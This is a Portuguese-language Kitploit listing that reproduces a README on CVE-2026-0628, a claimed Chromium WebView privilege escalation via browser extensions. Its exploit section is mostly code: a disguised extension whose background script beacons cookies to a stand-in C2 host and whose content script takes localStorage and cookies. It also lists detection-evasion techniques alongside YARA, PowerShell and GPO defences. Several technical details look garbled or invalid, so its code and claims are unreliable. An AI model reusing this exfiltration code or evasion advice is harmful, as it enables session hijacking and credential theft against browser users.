Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Dissecting-CVE-2026-0628-Chromium-Extension-Privilege-Escalation — Dissecação técnica da CVE-2026-0628, uma vulnerabilidade de escalonamento de privilégios no Chromium WebView, incluindo análise de causa raiz, exploit PoC, regras de detecção e estratégias de mitigação. | Kitploit
Ferramentas/GitHubGitHub/sastraadiwiguna-purpleeliteteaming/dissecting-cve-2026-0628-chromium-extension-privilege-escalation
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoSegurança WebAnálise de MalwareForensia Digital
GitHubsastraadiwiguna-purpleeliteteaming/dissecting-cve-2026-0628-chromium-extension-privilege-escalation

Dissecting-CVE-2026-0628-Chromium-Extension-Privilege-Escalation

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Dissecação técnica da CVE-2026-0628, uma vulnerabilidade de escalonamento de privilégios no Chromium WebView, incluindo análise de causa raiz, exploit PoC, regras de detecção e estratégias de mitigação.

Ver RepositórioSite
1há 6 mesesAinda não revisado

DOI = doi.org/10.5281/zenodo.18413764

ORCID = orcid.org/0009-0007-7728-256X

root@kitploit:~

README.md


# **CVE-2026-0628: Escalação de Privilégios no Chromium WebView (Spoofing de Origem) – Pesquisa Técnica & Prova de Conceito**

**Autor:** Sastra Adi Wiguna (Purple Elite Teaming)
**Data da Pesquisa:** Janeiro de 2026
**ID do CVE:** CVE-2026-0628
**CVSS v3.1:** 8.8 (Alto)
**Versões Afetadas:** Chromium < 143.0.7499.192
**Status do Patch:** Corrigido no Chrome ≥143.0.7499.192, Edge ≥143.0.3650.139

---

## **1. Visão Geral**

### **1.1 Propósito da Pesquisa**
Este repositório documenta o **CVE-2026-0628**, uma **vulnerabilidade de escalada de privilégios de alta gravidade** no mecanismo de aplicação de políticas do WebView do Chromium. A vulnerabilidade permite que extensões maliciosas **contornem restrições de sandbox**, injetem scripts em **contextos privilegiados** (ex.: `chrome://`) e **escalem privilégios** para executar código arbitrário.

Esta pesquisa é **exclusivamente para fins de segurança defensiva**, incluindo:
- **Análise de vulnerabilidades**
- **Engenharia de detecção**
- **Desenvolvimento de estratégias de mitigação**
- **Testes de penetração (somente em ambientes autorizados)**

### **1.2 Aviso Legal**
- **Estritamente para pesquisa acadêmica e defensiva.**
- **Não use contra sistemas de produção sem autorização.**
- **Cumpra todas as leis aplicáveis e políticas de segurança organizacionais.**
- **Aplique o patch imediatamente:** Chrome ≥143.0.7499.192, Edge ≥143.0.3650.139.

---

## **2. Análise Técnica**

### **2.1 Causa Raiz**
**Aplicação insuficiente de políticas** na implementação do WebView do Chromium permite que extensões **escapem dos limites da sandbox** e acessem **contextos DOM privilegiados**.

**Fluxo Vulnerável:**
1. Extensão maliciosa declara o uso do WebView no `manifest.json`.
2. A extensão injeta payload HTML/JS elaborado via tag `<webview>`.
3. **Bypass da validação de política do WebView** → Acesso a páginas privilegiadas (ex.: `chrome://settings`).
4. **Execução de script arbitrário** em contextos privilegiados.

**Vetor CVSS:**
`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`

### **2.2 Arquitetura do Exploit**
#### **Modelo de Extensão Maliciosa**
```json
{
  "manifest_version": 3,
  "name": "Legitimate Extension",
  "version": "1.0",
  "webview": {
    "src": "chrome://new-tab-page/",
    "plugins": {}
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["payload.js"]
  }]
}

Vetor de Injeção Crítico (payload.js)

root@kitploit:~
class WebViewExploiter {
  constructor() {
    this.privilegedTargets = [
      'chrome://new-tab-page/',
      'chrome-extension://background/',
      'chrome://settings/'
    ];
  }
  injectPayload(targetURL) {
    const webview = document.createElement('webview');
    webview.setAttribute('src', targetURL);
    webview.setAttribute('nodeintegration', ''); // Parâmetro-chave de bypass
    webview.addEventListener('dom-ready', () => {
      webview.executeScript({
        code: `
          window.chrome = window.chrome || {};
          chrome.runtime.sendMessage({action: 'steal_data'});
          document.body.innerHTML = '';
        `
      });
    });
    document.body.appendChild(webview);
  }
}

3. Avaliação de Impacto


4. Detecção e Forense

4.1 Regra YARA para Extensões Maliciosas

root@kitploit:~
rule CVE_2026_0628_WebView_Exploiter {
  meta:
    description = "Detects CVE-2026-0628 WebView exploit patterns"
    severity = "high"
  strings:
    $webview_abuse = "webview.*(nodeintegration|allowpopups)"
    $chrome_priv = /(chrome:\/\/|chrome-extension:\/\/)/
    $inject_sig = /(executeScript|getURL|sendMessage)/
  condition:
    all of ($*) and filesize < 500KB
}

4.2 Assinaturas de Eventos Sysmon

  • Event ID 1: chrome.exe → Criação suspeita de WebView.
  • Event ID 3: Conexão de rede → Extensão → C2 externo.
  • Registro: HKCU\Software\Google\Chrome\Extensions\[malicious_id].

5. Análise do Patch e Vetores de Bypass

5.1 Diff da Versão Corrigida (Chrome 143.0.7499.192+)

root@kitploit:~
// Vulnerável (pré-143.0.7499.192)
if (webview.src.startsWith('chrome://')) {
  return false; // Verificação de política fraca
}

// Corrigido
function validateWebViewPolicy(webview) {
  if (!isExtensionTrusted(webview.extensionId)) {
    throw new SecurityError('Extension not privileged');
  }
  if (webview.attributes.includes('nodeintegration')) {
    enforceStrictCSP(); // Reforço da Content-Security-Policy
  }
}

5.2 Implementação de Mitigação

Modelo GPO Empresarial

root@kitploit:~
{
  "ExtensionInstallBlacklist": ["malicious_extension_id*"],
  "ExtensionInstallForcelist": [],
  "WebViewRestrictions": {
    "DisableWebView": true,
    "BlockNodeIntegration": true
  }
}

Script de Detecção em Tempo de Execução (PowerShell)

root@kitploit:~
# Detect-CVE20260628.ps1
Get-Process chrome | ForEach {
  $extPath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions"
  Get-ChildItem $extPath | Where {
    (Get-Content "$_\manifest.json" | Select-String "webview") -and
    (Get-Content "$_\manifest.json" | Select-String "chrome://")
  }
}

6. Prova de Conceito (PoC) do Exploit

6.1 Estrutura de Diretórios

root@kitploit:~
cve-2026-0628-poc/
├── manifest.json
├── background.js
├── content.js
└── popup.html

6.2 Arquivos Principais

manifest.json (Manifesto de Bypass)

root@kitploit:~
{
  "manifest_version": 3,
  "name": "WebView Helper Tool",
  "version": "1.0",
  "permissions": ["activeTab", "storage", "tabs"],
  "host_permissions": ["<all_urls>", "chrome://*/*"],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["content.js"],
    "run_at": "document_start"
  }],
  "action": {
    "default_popup": "popup.html"
  },
  "web_accessible_resources": [{
    "resources": ["inject.js"],
    "matches": ["<all_urls>"]
  }]
}

background.js (Persistência e Beacon C2)

root@kitploit:~
chrome.runtime.onInstalled.addListener(() => {
  console.log('CVE-2026-0628 PoC Installed');
  setTimeout(initExploitation, 5000);
});

async function initExploitation() {
  fetch('http://your-c2-server.com/beacon?ext_id=' + chrome.runtime.id, {
    method: 'POST',
    body: JSON.stringify({
      victim: navigator.userAgent,
      cookies: await getAllCookies()
    })
  }).catch(() => {});
  chrome.tabs.onUpdated.addListener(exploitTab);
}

content.js (Gatilho e Injeção do WebView)

root@kitploit:~
(function() {
  const privilegedTargets = [
    'chrome://new-tab-page/',
    'chrome://settings/',
    'chrome://extensions/'
  ];
  function createMaliciousWebView(target) {
    const webview = document.createElement('webview');
    webview.setAttribute('src', target);
    webview.setAttribute('allowpopups', '');
    webview.addEventListener('dom-ready', () => {
      chrome.scripting.executeScript({
        target: {tabId: getCurrentTabId()},
        func: stealPrivilegedData
      });
    });
    document.body.appendChild(webview);
  }
  function stealPrivilegedData() {
    return {
      localStorage: Object.fromEntries(Object.entries(localStorage)),
      cookies: document.cookie,
      extensions: chrome.runtime.getManifest?.()
    };
  }
  setTimeout(() => {
    createMaliciousWebView('chrome://new-tab-page/');
  }, 1000);
})();

7. Reprodução em Laboratório

7.1 Requisitos

  • Chrome Vulnerável: 143.0.7499.191
  • SO: Windows 10/11 (VM recomendada)
  • Ferramentas: Burp Suite (proxy), REMnux (forense)

7.2 Passos

  1. Baixe o Chrome 143.0.7499.191 (vulnerável).
  2. Inicie com flags:
    root@kitploit:~
    chrome.exe --disable-web-security --user-data-dir=/tmp/vuln
    
  3. Carregue a extensão:
    • Navegue até chrome://extensions/.
    • Ative o Modo de Desenvolvedor.
    • Clique em Carregar sem compactação → Selecione cve-2026-0628-poc/.
  4. Dispare o exploit:
    • Navegue até chrome://new-tab-page/.
    • Observe a criação do WebView no DevTools.
  5. Monitore o tráfego:
    • Burp Suite (localhost:8080) → Capture a exfiltração para o C2.
  6. Verifique o sucesso:
    • Aba de rede → Beacon para your-c2-server.com.
    • Console: "CVE-2026-0628 OWNED".

8. Técnicas de Evasão de Detecção

  • Esteganografia: Codifique a exfiltração em pixels de imagem.
  • Geração de Domínios: DGA para rotação de C2.
  • Ataques de Temporização: Atrase a execução em 5-30s após a instalação.
  • Ofuscação do Manifesto: Codifique strings sensíveis em Base64.

9. Mitigação e Fluxo de Trabalho do Patch

  • Ação Imediata: Atualize o Chrome/Edge para versões corrigidas.
  • GPO Empresarial:
    root@kitploit:~
    {
      "ExtensionInstallBlacklist": ["*"],
      "WebViewRestrictions": {
        "DisableWebView": true,
        "BlockNodeIntegration": true
      }
    }
    
  • Detecção em Tempo de Execução:
    root@kitploit:~
    # Verificar extensões maliciosas
    Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions" |
      Where { (Get-Content "$_\manifest.json" | Select-String "webview") }
    

10. Análise Forense

10.1 Comandos Volatility3

root@kitploit:~
volatility3 -f memdump.raw windows.chrome.ChromeExtensions
yara3 -r cve-2026-0628.yar /path/to/chrome/extensions/

10.2 Regra YARA para Dumps de Memória

root@kitploit:~
rule CVE_2026_0628_Mojo_Origin_Spoof {
  strings:
    $mojo_hdr = { 4D 6F 6A 6F }
    $chrome_origin = "chrome://new-tab-page/"
    $webview_sig = "WebViewPolicyValidator"
  condition:
    all of them
}

11. Conclusão

11.1 Principais Descobertas

  • CVE-2026-0628 permite escalada de privilégios via bypass de política do WebView.
  • Impacto: Sequestro de sessão, roubo de credenciais, movimento lateral.
  • Mitigação: Aplique o patch no Chrome/Edge, imponha restrições de GPO, monitore extensões maliciosas.

11.2 Recomendações

  • Aplique o patch imediatamente para Chrome ≥143.0.7499.192 ou Edge ≥143.0.3650.139.
  • Implante regras YARA/Sysmon para detecção.
  • Restrinja extensões via GPO Empresarial.
  • Conduza exercícios de red team para validar as defesas.

12. Considerações Legais e Éticas

  • Somente uso autorizado.
  • Não implante em produção sem permissão explícita.
  • Reporte vulnerabilidades de forma responsável aos fornecedores.

Contato: Para questões de segurança defensiva, entre em contato com o autor via GitHub Issues.


© 2026 Sastra Adi Wiguna. Todos os direitos reservados.

root@kitploit:~
Baixar ferramenta
Fase do AtaqueImpacto TécnicoImpacto nos NegóciosMétricas CVSS
Instalação da ExtensãoConsentimento do usuário → PersistênciaVetor de engenharia socialUI:R (Necessário)
Bypass do WebViewFuga da sandbox → Contexto privilegiadoSequestro de sessãoS:U → C:H/I:H/A:H
Injeção de ScriptManipulação do DOM → Exfiltração de dadosRoubo de credenciaisPR:N (Sem Privilégios)
PersistênciaScript em segundo plano → Beacon C2Preparação para movimento lateralAC:L (Baixa Complexidade)